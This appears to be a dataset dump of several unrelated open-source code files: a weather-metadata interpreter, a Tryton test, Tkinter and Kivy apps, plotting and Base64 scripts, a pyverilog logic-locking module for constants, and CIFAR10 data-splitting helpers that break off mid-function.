The developer\n is advised to rerun this tool after each fix, until no further problems are\n raised.\n \"\"\"\n\n # 1) Interpret diagnostic and type-specific metadata, including cell methods\n if cube.name() in ANCILLARIES:\n self.field_type = self.ANCIL\n self.diagnostic = cube.name()\n if cube.cell_methods:\n self.errors.append(f\"Unexpected cell methods {cube.cell_methods}\")\n\n elif cube.name() in SPECIAL_CASES:\n self.field_type = self.diagnostic = cube.name()\n if cube.name() in WXCODE_NAMES:\n for cm in cube.cell_methods:\n valid_wx_cm = False\n for hour in [1, 3]:\n wx_cell_method = WXCODE_MODE_CM(hour)\n if cm == wx_cell_method:\n diagnostic = self.diagnostic.replace(\"_\", \" \")\n self.methods += (\n f\"{cm.method} of {cm.intervals[0]} \"\n f\"{diagnostic} over {cm.coord_names[0]}\"\n )\n valid_wx_cm = True\n break\n if not valid_wx_cm:\n self.errors.append(\n f\"Unexpected cell methods {cube.cell_methods}\"\n )\n elif cube.name() == \"wind_from_direction\":\n if cube.cell_methods:\n expected = CellMethod(method=\"mean\", coords=\"realization\")\n if len(cube.cell_methods) > 1 or cube.cell_methods[0] != expected:\n self.errors.append(\n f\"Unexpected cell methods {cube.cell_methods}\"\n )\n else:\n self.unhandled = True\n return\n\n else:\n if \"probability\" in cube.name() and \"threshold\" in cube.name():\n self.field_type = self.PROB\n self.check_probability_cube_metadata(cube)\n else:\n self.diagnostic = cube.name()\n try:\n perc_coord = find_percentile_coordinate(cube)\n except CoordinateNotFoundError:\n coords = get_coord_names(cube)\n if any(\n [cube.coord(coord).var_name == \"threshold\" for coord in coords]\n ):\n self.field_type = self.PROB\n self.check_probability_cube_metadata(cube)\n else:\n self.field_type = self.DIAG\n else:\n self.field_type = self.PERC\n if perc_coord.name() != PERC_COORD:\n self.errors.append(\n f\"Percentile coordinate should have name {PERC_COORD}, \"\n f\"has {perc_coord.name()}\"\n )\n\n if perc_coord.units != \"%\":\n self.errors.append(\n \"Percentile coordinate should have units of %, \"\n f\"has {perc_coord.units}\"\n )\n\n self.check_cell_methods(cube)\n\n # 2) Interpret model and blend information from cube attributes\n self.check_attributes(cube.attributes)\n\n # 3) Check whether expected coordinates are present\n coords = get_coord_names(cube)\n if \"spot_index\" in coords:\n self.check_spot_data(cube, coords)\n\n if self.field_type == self.ANCIL:\n # there is no definitive standard for time coordinates on static ancillaries\n pass\n elif self.blended:\n self._check_coords_present(coords, BLENDED_TIME_COORDS)\n else:\n self._check_coords_present(coords, UNBLENDED_TIME_COORDS)\n\n # 4) Check points are equal to upper bounds for bounded time coordinates\n for coord in [\"time\", \"forecast_period\"]:\n if coord in get_coord_names(cube):\n self._check_coord_bounds(cube, coord)\n\n # 5) Check datatypes on data and coordinates\n try:\n check_mandatory_standards(cube)\n except ValueError as cause:\n self.errors.append(str(cause))\n\n # 6) Check multiple realizations only exist for ensemble models\n if self.field_type == self.DIAG:\n try:\n realization_coord = cube.coord(\"realization\")\n except CoordinateNotFoundError:\n pass\n else:\n model_id = cube.attributes.get(self.model_id_attr, \"ens\")\n if \"ens\" not in model_id and len(realization_coord.points) > 1:\n self.errors.append(\n f\"Deterministic model should not have {len(realization_coord.points)} \"\n \"realizations\"\n )\n\n # 7) Raise collated errors if present\n if 
self.errors:\n raise ValueError(\"\\n\".join(self.errors))\n\n\ndef _format_standard_cases(\n interpreter: MOMetadataInterpreter, verbose: bool, vstring: Callable[[str], str]\n) -> List[str]:\n \"\"\"Format prob / perc / diagnostic information from a\n MOMetadataInterpreter instance\"\"\"\n field_type = interpreter.field_type.replace(\"_\", \" \")\n diagnostic = interpreter.diagnostic.replace(\"_\", \" \")\n if interpreter.relative_to_threshold:\n relative_to_threshold = interpreter.relative_to_threshold.replace(\"_\", \" \")\n\n rval = []\n rtt = (\n f\" {relative_to_threshold} thresholds\"\n if interpreter.field_type == interpreter.PROB\n else \"\"\n )\n rval.append(f\"It contains {field_type} of {diagnostic}{rtt}\")\n if verbose:\n rval.append(vstring(\"name, threshold coordinate (probabilities only)\"))\n\n if interpreter.methods:\n rval.append(f\"These {field_type} are of {diagnostic}{interpreter.methods}\")\n if verbose:\n rval.append(vstring(\"cell methods\"))\n\n ppstring = \"some\" if interpreter.post_processed else \"no\"\n rval.append(f\"It has undergone {ppstring} significant post-processing\")\n if verbose:\n rval.append(vstring(\"title attribute\"))\n return rval\n\n\ndef display_interpretation(\n interpreter: MOMetadataInterpreter, verbose: bool = False\n) -> str:\n \"\"\"Prints metadata interpretation in human-readable form. This should\n not be run on a MOMetadataInterpreter instance that has raised errors.\n\n Args:\n interpreter:\n Populated instance of MOMetadataInterpreter\n verbose:\n Optional flag to include information about the source of the\n metadata interpretation (eg name, coordinates, attributes, etc)\n\n Returns:\n Formatted string describing metadata in human-readable form\n \"\"\"\n if interpreter.unhandled:\n return f\"{interpreter.diagnostic} is not handled by this interpreter\\n\"\n\n def vstring(source_metadata):\n \"\"\"Format additional message for verbose output\"\"\"\n return f\" Source: {source_metadata}\"\n\n field_type = interpreter.field_type.replace(\"_\", \" \")\n output = []\n if field_type == \"realizations\":\n field_type_clause = f\"file containing one or more {field_type}\"\n else:\n field_type_clause = f\"{field_type} file\"\n output.append(f\"This is a {interpreter.prod_type} {field_type_clause}\")\n if verbose:\n output.append(vstring(\"name, coordinates\"))\n\n if interpreter.diagnostic not in SPECIAL_CASES:\n output.extend(_format_standard_cases(interpreter, verbose, vstring))\n\n if interpreter.diagnostic in WXCODE_NAMES and interpreter.methods:\n output.append(f\"These {field_type} are {interpreter.methods}\")\n if verbose:\n output.append(vstring(\"cell methods\"))\n\n if interpreter.diagnostic in ANCILLARIES:\n output.append(\"This is a static ancillary with no time information\")\n elif interpreter.blended:\n output.append(f\"It contains blended data from models: {interpreter.model}\")\n if verbose:\n output.append(\n vstring(\"title attribute, model ID attribute, model run attribute\")\n )\n else:\n if interpreter.model:\n output.append(f\"It contains data from {interpreter.model}\")\n if verbose:\n output.append(vstring(\"model ID attribute\"))\n else:\n output.append(\"It has no source model information and cannot be blended\")\n if verbose:\n output.append(vstring(\"model ID attribute (missing)\"))\n\n if interpreter.warnings:\n warning_string = \"\\n\".join(interpreter.warnings)\n output.append(f\"WARNINGS:\\n{warning_string}\")\n\n return \"\\n\".join(output) + 
\"\\n\"\n","repo_name":"metoppv/improver","sub_path":"improver/developer_tools/metadata_interpreter.py","file_name":"metadata_interpreter.py","file_ext":"py","file_size_in_byte":26552,"program_lang":"python","lang":"en","doc_type":"code","stars":95,"dataset":"github-code","pt":"90"} +{"seq_id":"42887933977","text":"\nfrom trytond.tests.test_tryton import ModuleTestCase, with_transaction\nfrom trytond.transaction import Transaction\nfrom trytond.pool import Pool\n\n\nclass ProductCodeUniqueTestCase(ModuleTestCase):\n 'Test ProductCodeUnique module'\n module = 'product_code_unique'\n\n @with_transaction()\n def test0010check_uniqueness(self):\n 'Test check uniqueness'\n pool = Pool()\n Template = pool.get('product.template')\n Uom = pool.get('product.uom')\n transaction = Transaction()\n\n kilogram, = Uom.search([\n ('name', '=', 'Kilogram'),\n ], limit=1)\n Template.create([{\n 'name': 'P1',\n 'type': 'goods',\n 'default_uom': kilogram.id,\n 'products': [('create', [{\n 'code': '1',\n }])],\n }])\n\n # Don't fail if no code\n Template.create([{\n 'name': 'P2',\n 'type': 'goods',\n 'default_uom': kilogram.id,\n 'products': [('create', [{}])],\n }])\n\n # Fail if repeated code\n self.assertRaises(Exception, Template.create([{\n 'name': 'P3',\n 'type': 'goods',\n 'default_uom': kilogram.id,\n 'products': [('create', [{\n 'code': '1',\n }])],\n }]))\n transaction.rollback()\n\n\ndel ModuleTestCase\n","repo_name":"NaN-tic/trytond-product_code_unique","sub_path":"tests/test_module.py","file_name":"test_module.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"17710897804","text":"from tkinter import *\r\nfrom tkinter import ttk,messagebox\r\nimport sqlite3\r\nfrom tkinter import messagebox\r\nclass Faculty:\r\n def __init__(self,root):\r\n self.root = root\r\n self.root.title(\"Attendance Management System\")\r\n self.root.geometry(\"1700x800+0+0\")\r\n self.root.configure(background=\"#96989b\")\r\n\r\n title=Label(self.root,text=\"Mark Attendance\",bd=10,relief=GROOVE,font=(\"times new roman\",40,\"bold\"),bg=\"yellow\",fg=\"red\")\r\n title.pack(side=TOP,fill=X)\r\n\r\n\r\n\r\nif __name__==\"__main__\":\r\n root = Tk()\r\n ob = Faculty(root)\r\n root.mainloop()","repo_name":"harshitjain123456/Attendance-Managment-system-","sub_path":"Mark_attendance.py","file_name":"Mark_attendance.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"28894936025","text":"import matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport matplotlib.font_manager\nimport numpy as np\nimport sys\n\nfrom math import log10, floor\nfrom matplotlib import rcParams\nfrom matplotlib.ticker import FormatStrFormatter\n\nimport os.path\n\nplt.style.use('miller')\n\ndef exp(number) -> int:\n return abs(floor(log10(abs(number))))\n \ndef plot(name, threads):\n colors = [\"#0040a8\", \"#00a835\", \"#d7db0d\", \"#960500\", \"#960050\", \"#09b6ba\"]\n \n ith = 0\n outpath = \"/mnt/c/Users/words/eclipse/Thesis/\"\n outname = \"Vulcan_Figure-5.pdf\"\n \n plt.xlabel(\"Number of bodies\")\n plt.ylabel(\"Computation Time in Milliseconds\")\n\n log = plt.gca()\n log.set_xscale('log')\n log.set_yscale('log')\n log.tick_params(axis='both', which='major', direction='in')\n log.tick_params(axis='x', which='minor', bottom=False)\n log.xaxis.set_major_formatter(ticker.FuncFormatter(lambda y, _ : f'{exp(y)}'))\n\n if name != 
\"All\":\n plt.title(name+\" Threading\", fontsize = 24)\n\n for ii in range(1,threads+1):\n x,y = read(\"../../data/BS-threadTesting.2.txt\", name.lower(), ii)\n lin.plot(x,y, label = str(ii), c = colors[ii%len(colors)])\n log.plot(x, y, c = colors[ii%len(colors)])\n legend = plt.figlegend(prop={'size': 20}, title = \"Threads\", fontsize = 20, fancybox = True, loc = \"upper left\", bbox_to_anchor=(0.075,0.95))\n plt.setp(legend.get_title(),fontsize = 20)\n plt.savefig(outpath+outname, bbox_inches=\"tight\")\n else:\n plt.title(\"Measured improvement of parallelization\")\n for handle, label in zip([\"omp\", 'explicit', 'single'], ['Intra-step', 'Inter-step', 'Serial']):\n x,y = read(\"../../data/BS-threadTesting.2.txt\", handle, threads)\n log.plot(np.array(x) * 1e2, y, label=label, linewidth=2)\n \n plt.legend(prop={'size': 20}, title = \"Method\", fontsize=20, fancybox=True)\n plt.savefig(outpath+outname, bbox_inches=\"tight\")\n plt.show()\n \n \ndef read(filename, mode, threads):\n with open(filename) as fp:\n lines = fp.readlines();\n\n x = list()\n y = list()\n for ii in range(len(lines)):\n temp = lines[ii].split()\n if len(temp) > 3:\n if temp[0] == mode and int(temp[3]) == threads:\n x.append(int(temp[1]))\n y.append(int(temp[2]))\n return x,y\n\nplot(\"All\", 6)\n","repo_name":"WMiller256/Vulcan","sub_path":"src/plotting/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"90"} +{"seq_id":"40581743326","text":"# Reverse Vowels in a String\n# https://leetcode.com/problems/reverse-vowels-of-a-string/description/\nclass Solution:\n def reverseVowels(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n vowels =\"aeiouAEIOU\"\n str = list(s)\n index1 = index2 = 0;\n i = 0;\n index2 = len(str)-1;\n j = index2;\n k=0;\n char = char2 = ''\n \n while (1):\n #print (str);\n #print (\"index1\",index1,\"index2\",index2)\n if (index1 >= index2):\n break;\n \n for i in range(index1, j+1):\n # print (\"looping i\",i,\"index1\",index1,\"i\",i,\"j\",j)\n char = str[i]\n if char in vowels:\n # print (\"in vowel ->\",char)\n index1 = i+1\n break;\n \n if (i >= index2):\n break;\n \n for j in range(index2, i-1, -1):\n # print (\"looping j\",j,\"index2\",index2,\"i\",i,\"j\",j)\n char2 = str[j]\n if char2 in vowels:\n # print (\"in vowel --->\",char2)\n index2 = j-1\n break;\n \n \n #print (\"chars \",char,char2)\n if (char in vowels and char2 in vowels):\n # print (char,char2,\"---swap\",index1,index2)\n str[index2+1] = char\n str[index1-1] = char2\n continue;\n \n return ''.join(str)\n \n","repo_name":"venkatsvpr/Problems_Solved","sub_path":"LC_Reverse_Vowels_in_String.py","file_name":"LC_Reverse_Vowels_in_String.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"90"} +{"seq_id":"39552494608","text":"T = int(input())\n\nbase64_table = {\n 'A' : 0,\n 'a' : 26,\n '0' : 52,\n '+' : 62,\n '/' : 63\n}\n\ndef to_binary(encoded_str):\n\n cal_str = ''\n\n if encoded_str.isupper():\n cal_str = 'A'\n elif encoded_str.islower():\n cal_str = 'a'\n elif encoded_str.isdecimal():\n cal_str = '0'\n\n binary_str = bin(base64_table[cal_str] + (ord(encoded_str) - ord(cal_str)))[2:]\n return '0'*(6-len(binary_str)) + binary_str\n\n\nfor tc in range(1, T+1):\n encoded_str = input()\n split_list = [list(encoded_str[index:index+4]) for index in range(0, len(encoded_str), 4)]\n binary_str = 
''.join([to_binary(alpha) for item in split_list for alpha in item])\n    binary_list = [chr(int(binary_str[index:index+8], 2)) for index in range(0, len(binary_str), 8)]\n    \n    decoded_str = ''.join(binary_list)\n    print('#{} {}'.format(tc, decoded_str))","repo_name":"younygo1004/Algorithm_Solving","sub_path":"python/SWEA/D2/1928. Base64 Decoder/base64.py","file_name":"base64.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"22480076124","text":"def execute(cmd) :\n\tpopen = subprocess.Popen(cmd, stdout = subprocess.PIPE, universal_newlines = True)\n\tfor stdout_line in iter(popen.stdout.readline, \"\") :\n\t\tyield stdout_line\n\tpopen.stdout.close()\n\treturn_code = popen.wait()\n\tif return_code :\n\t\traise subprocess.CalledProcessError(return_code, cmd)\n\n\ndef execute(command) :\n\tpopen = subprocess.Popen(command, stdout = subprocess.PIPE, bufsize = 1)\n\tlines_iterator = iter(popen.stdout.readline, b\"\")\n\twhile popen.poll() is None :\n\t\tfor line in lines_iterator :\n\t\t\tnline = line.rstrip()\n\t\t\tprint(nline.decode(\"latin\"), end = \"\\r\\n\", flush = True)\n\n","repo_name":"Cxm211/ExplainingCodeBERTforSemanticClones","sub_path":"Python/data/Filtered Python Codes/Clone505.py","file_name":"Clone505.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"26547807967","text":"import pyverilog.vparser.ast as vast\n\ndef encrypt_value(value, start_kb, cfg):\n    ikey = []\n    for k in range(start_kb,start_kb+len(value)):\n        pos = k % len(cfg.input_key)\n        ikey.append(int(cfg.input_key[pos]))\n\n    val = []\n    rvalue = value[len(value)::-1]\n    for k in range(0, len(value)):\n        val.append(int(rvalue[k]))\n    rresult = []\n    for k in range(0,len(value)):\n        rresult.append(ikey[k] ^ val[k])\n    result = rresult[len(rresult)::-1]\n    res = \"\"\n    for k in range(0,len(result)):\n        res += str(result[k])\n    key_str = \"\"\n    for k in range(0,len(ikey)):\n        key_str += str(ikey[k])\n    return [res, key_str]\n\n\ndef is_const(item):\n    if item.value.find(\"'\") == -1:\n        try:\n            val = int(item.value)\n            return True\n        except ValueError:\n            raise Exception(\"Malformed constant\")\n    if item.value.find(\"x\") != -1:\n        return False\n    if item.value.find(\"X\") != -1:\n        return False\n    return True\n\n\ndef get_const_size(item):\n    if item.value.find(\"'\") == -1:\n        return -1\n    return int(item.value[:item.value.find(\"'\")])\n\ndef binaryToDecimal(n):\n    return int(n,2)\n\ndef apply(item, cfg, res, sig_size,list_working_key,user_key,total_constant,set):\n    if is_const(item) == False:\n        return item\n    if sig_size > 0:\n        size = sig_size\n    else:\n        size = get_const_size(item)\n    if size == -1:\n        return item\n    if cfg.obfuscate_consts == -1 or size < cfg.obfuscate_consts or not cfg.obfuscate_region:\n        return item\n\n    signed = False\n    trimmed = None\n    const_type = None\n    if item.value.find(\"'sb\") != -1:\n        trimmed = item.value[item.value.find(\"sb\")+2:]\n        const_type = \"sb\"\n        signed = True\n    elif item.value.find(\"'b\") != -1:\n        const_type = \"b\"\n        trimmed = item.value[item.value.find(\"b\")+1:]\n    elif item.value.find(\"'d\") != -1:\n        const_type = \"d\"\n        trimmed = item.value[item.value.find(\"d\")+1:]\n    elif item.value.find(\"'h\") != -1:\n        const_type = \"d\"\n        trimmed = item.value[item.value.find(\"h\")+1:]\n        trimmed = str(int(trimmed, 16))\n    else:\n        const_type = \"d\"\n        trimmed = item.value\n\n    if (const_type == \"b\" or const_type == \"sb\") and len(trimmed) != size and int(trimmed) != 0:\n        item.show()\n        #raise Exception(\"Malformed constant\")\n    if (const_type == \"b\" or const_type == \"sb\") and len(trimmed) == 1 and int(trimmed) == 0:\n        trimmed = \"0\" * size\n\n    if const_type == \"d\":\n        current = int(trimmed)\n        trimmed = bin(current)[2:]\n\n        extra_bits = size - len(trimmed)\n        if extra_bits > 0:\n            if current >= 0:\n                trimmed = extra_bits * \"0\" + trimmed\n            else:\n                trimmed = extra_bits * \"1\" + trimmed\n\n    if cfg.unfold_key == False and ((len(cfg.working_key)+size) > len(cfg.input_key)):\n        return item\n\n    name = \"Const_\" + str(res.num_consts)\n    sig = vast.Identifier(name)\n    if size>1:\n        width = vast.Width( vast.IntConst(str(size-1)), vast.IntConst('0') )\n        res.top_output.definitions += (vast.Wire(name, width, signed),)\n    else:\n        res.top_output.definitions += (vast.Wire(name),)\n\n    current_bit_start = res.top_output.initial_working_key + res.top_output.key_bits\n    enc, key_value = encrypt_value(trimmed, len(cfg.working_key), cfg)\n    result=binaryToDecimal(enc)\n    enc=str(result)\n    verilog = vast.IntConst(str(size) + \"\\'d\" + enc)\n\n    if size==1:\n        set[0]=set[0]+1\n        if user_key == 1:\n            result=list_working_key[current_bit_start]\n            enc=str(result)\n            key_part = vast.IntConst(str(size) + \"\\'d\" + enc)\n        else:\n            key_part = vast.Pointer(vast.Identifier('working_key'), vast.IntConst(str(current_bit_start)))\n\n    else:\n        set[0]=set[0]+1\n        if user_key == 1:\n            i=current_bit_start\n            string1=\"\"\n            while i<=current_bit_start+size-1:\n                string1=string1+str(list_working_key[i])\n                i=i+1\n            string1=string1[::-1]\n            
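# (added worked example) with size=3, current_bit_start=0 and list_working_key=[1,1,0], string1 is built as '110' and reversed to '011', so the key constant below becomes 3'd3\n            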
result=binaryToDecimal(string1)\n            enc=str(result)\n            key_part = vast.IntConst(str(size) + \"\\'d\" + enc)\n        else:\n            key_part = vast.Partselect(vast.Identifier('working_key'), vast.IntConst(str(current_bit_start+size-1)), vast.IntConst(str(current_bit_start)))\n\n    res.top_output.items += (vast.Assign(sig, vast.Xor(verilog, key_part)),)\n    res.top_output.key_bits += size\n    cfg.working_key += key_value\n    res.top_output.module_key += key_value\n    res.num_consts += 1\n    return sig\n","repo_name":"solmannn/alu","sub_path":"obfuscation_techniques/obfuscate_const.py","file_name":"obfuscate_const.py","file_ext":"py","file_size_in_byte":7095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"26622013854","text":"import math\r\nprint('ATTENTION')\r\nprint('-='*30)\r\nprint(''' Instructions appear below after you enter the numbers ''')\r\nprint('-='*30)\r\nn=int(input('Enter a number: '))\r\nn2=int(input('Enter another number: '))\r\nop=''\r\nwhile op!='6':\r\n    print('''\r\n    [1] = Multiplication\r\n    [2] = Subtraction\r\n    [3] = Addition\r\n    [4] = Division\r\n    [5] = Enter new numbers\r\n    [6] = Quit''')\r\n    op=input('Choose an option: ').upper().strip()\r\n    print('-='*30)\r\n    if op == '1':\r\n        print(f'{n} X {n2} = {n*n2}')\r\n    elif op=='2':\r\n        print(f'{n}-{n2}={n-n2}')\r\n    elif op=='3':\r\n        print(f'{n}+{n2}={n+n2}')\r\n    elif op=='4':\r\n        print(f'{n} / {n2}={n/n2} ')\r\n    elif op=='5':\r\n        n=int(input('Enter a number: '))\r\n        n2=int(input('Enter another number: '))\r\n    elif op!='6':\r\n        print('Unsupported option')\r\nprint('End of program')","repo_name":"Dacianobrian/Calculadora.py","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"71014187729","text":"# -*- coding: utf-8 -*-\r\nfrom kivy.app import App\r\nfrom kivy.lang.builder import Builder\r\nfrom kivy.config import Config\r\nfrom kivy.uix.label import Label\r\nfrom kivy.uix.vkeyboard import VKeyboard\r\nfrom kivy.core.window import Window\r\nfrom kivy.properties import ObjectProperty\r\nfrom kivy.uix.popup import Popup\r\nfrom kivy.uix.dropdown import DropDown\r\nfrom kivy.uix.screenmanager import ScreenManager, Screen\r\nimport re\r\nfrom datetime import datetime\r\nimport mysql.connector\r\nmydb=mysql.connector.connect(host=\"127.0.0.1\", user=\"root\", passwd=\"qwer@1234\", database=\"db1\")\r\nfrom datetime import date\r\n\r\nConfig.set('kivy', 'keyboard_mode', 'systemanddocked')\r\nBuilder.load_file('KV/p_form.kv')\r\nBuilder.load_file('KV/p_registration.kv')\r\nBuilder.load_file('KV/p_pre_post_test.kv')\r\n\r\n\r\nclass CustomDropDown(DropDown):\r\n    pass\r\n\r\n\r\nclass FormScreen(Screen):\r\n    yes = ObjectProperty(True)\r\n    no = ObjectProperty(True)\r\n\r\n    def __init__(self, **kwargs):\r\n        super(FormScreen, self).__init__(**kwargs)\r\n        gender_dropdown = CustomDropDown()\r\n        self.ids.p_gender.bind(on_release=gender_dropdown.open)\r\n        gender_dropdown.bind(on_select=lambda instance, x: setattr(self.ids.p_gender, 'text', x))\r\n        self.ids.p_dob.bind(on_text_validate=lambda x: self.match(self.ids.p_dob))\r\n\r\n    def match(self, dob_field):\r\n        dob_pattern = 
r'(((0[1-9]|[12][0-9]|3[01])([/])(0[13578]|10|12)([/])(\\d{4}))|(([0][1-9]|[12][0-9]|30)([/])(0[469]|11)([/])(\\d{4}))|((0[1-9]|1[0-9]|2[0-8])([/])(02)([/])(\\d{4}))|((29)(\\.|-|\\/)(02)([/])([02468][048]00))|((29)([/])(02)([/])([13579][26]00))|((29)([/])(02)([/])([0-9][0-9][0][48]))|((29)([/])(02)([/])([0-9][0-9][2468][048]))|((29)([/])(02)([/])([0-9][0-9][13579][26])))'\r\n\r\n numbers = re.match(dob_pattern, dob_field.text)\r\n if numbers:\r\n curr_year = int(date.today().year)\r\n dob_year = int(self.ids.p_dob.text[6:10])\r\n age = str(curr_year - dob_year)\r\n self.ids.p_age.text = age + \" Years\"\r\n else:\r\n dob_pop = Popup(title=\"Error\", size=(280, 200), size_hint=(None, None),\r\n content=Label(text=\"Please Enter a valid Date Of Birth. \\n(e.g. 01/01/1999)\"))\r\n dob_pop.open()\r\n dob_field.text = ''\r\n self.ids.p_age.text = ''\r\n\r\n def submit_popup(self):\r\n # To get the radio button values\r\n if self.ids.p_smoke_yes.active:\r\n smoke = \"Yes\"\r\n print(\"smoker=\" + smoke)\r\n else:\r\n smoke = \"No\"\r\n print(\"smoker=\" + smoke)\r\n\r\n # To get the gender button values\r\n gender = self.ids.p_gender.text\r\n print(\"gender=\" + gender)\r\n # Popups For Submit Button\r\n pop_sub = Popup(title=\"Submit\", title_align=\"center\", content=Label(text=\"Information Submitted Successfully\"),\r\n size=(300, 200),\r\n size_hint=(None, None), auto_dismiss=True)\r\n\r\n pop_empty = Popup(title=\"Error\", title_align=\"center\",\r\n content=Label(text=\"Empty Field.\\nPlease Fill All Information\"),\r\n size=(300, 200),\r\n size_hint=(None, None), auto_dismiss=True)\r\n\r\n pop_gender = Popup(title=\"Error\", title_align=\"center\",\r\n content=Label(text=\"Please Select A Gender.\"),\r\n size=(300, 200),\r\n size_hint=(None, None), auto_dismiss=True)\r\n if self.ids.p_fname.text == '' or self.ids.p_height.text == '' or self.ids.p_weight.text == '' \\\r\n or self.ids.p_dob.text == '' or self.ids.p_mname.text == '' or self.ids.p_lname.text == '':\r\n pop_empty.open()\r\n elif self.ids.p_gender.text == 'Gender':\r\n pop_gender.open()\r\n else:\r\n pop_sub.open()\r\n\r\n @staticmethod\r\n def exit_prog():\r\n App.get_running_app().stop()\r\n Window.close()\r\n\r\n @staticmethod\r\n def showKeyboard():\r\n keyboard = VKeyboard()\r\n return keyboard\r\n \r\n def fun(self, p_fname, p_mname, p_lname, p_height,p_weight,p_dob, p_age, p_gender, p_smoke_yes):\r\n \r\n now = datetime.now()\r\n formatted_date = now.strftime('%Y-%m-%d %H:%M:%S')\r\n \r\n datetime_str = p_dob\r\n datetime_object = datetime.strptime(datetime_str, '%d/%m/%Y').date()\r\n mycursor = mydb.cursor()\r\n sql=\"\"\"insert into tb1 \r\n (p_fname, p_mname, p_lname, p_height,p_weight, p_dob, p_age, p_gender, p_smoker, p_registrationinfo) \r\n values( %s, %s, %s, %s, %s, %s, %s, %s , %s , %s)\"\"\"\r\n val = (p_fname, p_mname, p_lname, p_height,p_weight, datetime_object, p_age, p_gender, p_smoke_yes , formatted_date)\r\n mycursor.execute(sql, val)\r\n mydb.commit()\r\n \r\n\r\n\r\nclass RegistrationScreen(Screen):\r\n pass\r\n\r\n\r\nclass PrePostTestScreen(Screen):\r\n pass\r\n\r\n\r\nclass ThisApp(App):\r\n def build(self):\r\n screen_mgr = ScreenManager()\r\n screen_mgr.add_widget(RegistrationScreen(name=\"Registration_Screen\"))\r\n screen_mgr.add_widget(FormScreen(name=\"Form_Screen\"))\r\n screen_mgr.add_widget(PrePostTestScreen(name=\"PrePostTest_Screen\"))\r\n return screen_mgr\r\n\r\n\r\nif __name__ == '__main__':\r\n 
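# build() below returns a ScreenManager wired with the Registration, Form and PrePostTest screens\r\n    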
ThisApp().run()\r\n","repo_name":"Ghavan/Dbreath","sub_path":"untitled2.py","file_name":"untitled2.py","file_ext":"py","file_size_in_byte":5319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"9937628391","text":"#!/usr/bin/env python\n# imports and declarations\nimport datetime\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\n\nimport tensorflow as tf\nimport tensorflow.keras.datasets.cifar10 as cifar10\n\n# validate that tensorflow works and GPU is properly configured\nprint(\"Num GPUs Available: \", len(tf.config.experimental.list_physical_devices('GPU')))\n\ndef holdout(data_in,training_pct=0.7):\n    \"\"\"\n    Split data into training and validation sets based on a given ratio\n    Inputs: \n    - `data_in`, CIFAR10 data\n    - `training_pct`, fraction of data used for training (default `0.7`)\n\n    Outputs:\n    - tuple of `training_data` and `validation_data` after split\n    \"\"\"\n    num_records_in_training_set=int(len(data_in) * training_pct)\n    np.random.shuffle(data_in)\n    training_data = data_in[0:num_records_in_training_set]\n    validation_data = data_in[num_records_in_training_set:]\n    return training_data, validation_data\n\ndef select_k_training_group(k_groups, validation_set_index):\n    training_set = np.array([])\n    for i in range(len(k_groups)):\n        if i == validation_set_index -1:\n            validation_set = k_groups[i]\n        else:\n            if training_set.size == 0:\n                training_set = k_groups[i]\n            else:\n                training_set = np.concatenate((training_set,k_groups[i]))\n    return training_set, validation_set\n\ndef k_folds(data_in, num_groups, validation_set_index):\n    \"\"\"\n    Split data into a specified number of groups and select one as validation data,\n    using the rest as training data\n\n    Inputs:\n    `data_in` -- CIFAR10 data; \n    `num_groups` -- number of k-groups used; and\n    `validation_set_index` -- k-group to use as validation set\n\n    Outputs:\n    `training_set`, `validation_set` -- tuple of the training data and the selected validation group\n    \"\"\"\n    np.random.shuffle(data_in)\n    leftover_records_as_divided = len(data_in) % num_groups\n    num_records_in_k_group = math.floor(len(data_in)/num_groups)\n    k_groups = []\n    previous_k_slice = 0\n    for i in range(num_groups):\n        k_slice = previous_k_slice + num_records_in_k_group\n        if i < leftover_records_as_divided:\n            k_slice = k_slice + 1\n        k_group = data_in[previous_k_slice:k_slice]\n        k_groups.append(k_group)\n        previous_k_slice = k_slice\n\n    training_set = np.array([])\n    for i in range(len(k_groups)):\n        if i == validation_set_index -1:\n            validation_set = k_groups[i]\n        else:\n            if training_set.size == 0:\n                training_set = k_groups[i]\n            else:\n                training_set = np.concatenate((training_set,k_groups[i]))\n    # return k_groups\n    return training_set, validation_set\n\ndef generate_random_numbers(num_randoms, sample_space):\n    \"\"\"\n    Generate an array of random numbers.\n    \"\"\"\n    randoms = []\n    while len(randoms) < num_randoms:\n        # randint is inclusive at both ends, so subtract 1 to keep the result a valid index\n        new_random = random.randint(0,sample_space - 1)\n        randoms.append(new_random)\n    return randoms\n\ndef bootstrap(data_in, batch_size, num_batches):\n    \"\"\"\n    Generate n samples of a given batch size, containing random data, with replacement\n\n    Inputs:\n    `data_in` -- CIFAR10 data; \n    `batch_size` -- number of records in each sample; and\n    `num_batches` -- number of bootstrap samples to draw\n\n    Outputs:\n    `bootstrap_datasets` -- batched datasets of specified size\n    \"\"\"\n    bootstrap_datasets=[None] * num_batches\n    for i in range(num_batches):\n        bootstrap_datasets[i] = []\n        np.random.shuffle(data_in)\n        random_indices = 
